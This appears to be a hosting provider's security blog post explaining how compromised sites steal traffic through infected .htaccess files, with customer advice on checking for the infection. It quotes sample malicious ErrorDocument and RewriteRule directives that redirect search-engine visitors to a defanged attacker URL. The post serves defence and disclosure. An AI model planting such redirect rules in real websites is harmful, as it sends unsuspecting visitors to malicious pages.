What is Traffic Theft?

There have been some recent allegations stating that a handful of compromised websites on our network involved with domain traffic “hijacking” was somehow connected to the illegal intrusion in January that caused us to initiate a complete password reset of all FTP and SSH users.

An extensive investigation has revealed that no customer FTP or SSH user accounts have been maliciously accessed due to this password breach. The websites reported as involved with this traffic hijacking have been reviewed and the site owners notified of the issue on their sites.

Domain hijacking has been around as long as web apps have existed, and until bug-free software exists, it will continue to trouble website owners for some time to come. We wanted to explain exactly what is meant by “hijacking” to help clear up some confusion.

Have you ever wondered, “Why would anyone try to hack my website?” Many answer this by presuming they’re too small of a target to become a victim of a high-tech crime syndicate, but truth be told these criminals want your sites and they want them badly. Why? Well it all comes down to money. The more hosts they have compromised, the more money they can make.

Cyber criminals’ main intent is to hit a site and go unnoticed…until it’s time to cash out. Attackers don’t care how big or small you are, and it is more likely that a site that is run by a small business or single site owner is going to not only be behind on their security updates for any software running on their site, but it’s also unlikely that they regularly monitor their site for malicious activity.

The “cash out” phase is usually when of our customers first find out that they’ve been compromised. By that time their site(s) are now taking part in one or more unscrupulous online activities. We will be doing a short series of posts that cover methods these attackers use as well as what you should be on the look out for.

Today we will be going into just one of these attacker’s malicious actions, so you know a little more about what to look for.

Traffic theft: via infected .htaccess files.

If you notice your site’s traffic unexpectedly dropping, or perhaps you’ve been flagged by Google as having “malicious” content, then there’s a good chance your site has been compromised.

What the attackers may have done is setup or infected your existing “.htaccess” file on your site. .htaccess files are read by your web server to govern the way your site behaves. .htaccess files can be created with rules that will steal your legitimate traffic and send the visitor to an attacker’s malicious URL. This attack originated with by simply infecting a site’s pages via iframe tags, but it has since evolved to utilize .htaccess “RewriteRule” and “ErrorDocument” directives.

Here is a simple example:

ErrorDocument 403 hxxp://congatarcxisi.ru/mays/index.php
ErrorDocument 404 hxxp://congatarcxisi.ru/mays/index.php

And here is a more complicated one:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|…
RewriteRule ^(.*)$ hxxp://congatarcxisi.ru/mays/index.php [R=301,L]

(to explain the above, the attackers are basically taking any search engine traffic, and redirecting it to their site)

You can check for these types of infections on your own! Just review your site’s .htaccess files (you may need to enable viewing of hidden files in your FTP/sFTP client so you can view “.htaccess”.) We are already actively scanning for these infections on our customers sites, so if you see an email from our Security team please make sure you review the report and take the recommended actions.

Based on the sites we have cleaned up already, these attacks have almost universally been due to insecure website software running on the site in question. You could have the best passwords in the world, but if the apps you’ve installed on your server have any security vulnerabilities or aren’t kept up to date, attackers can still find their way in.

We are are open to sharing information about web based attacks because we strongly believe in cooperation, collaboration, and responsible disclosure regarding Internet security. If you are interested in providing details related to these attacks or have questions for us, please contact our abuse team with information about any projects you may be working on that may be related to these infections and we will be glad to discuss this matter with you further.

In a follow up post I will cover the life of a web based attack when a new vulnerability is released (from 0day to 1000day), so stay tuned!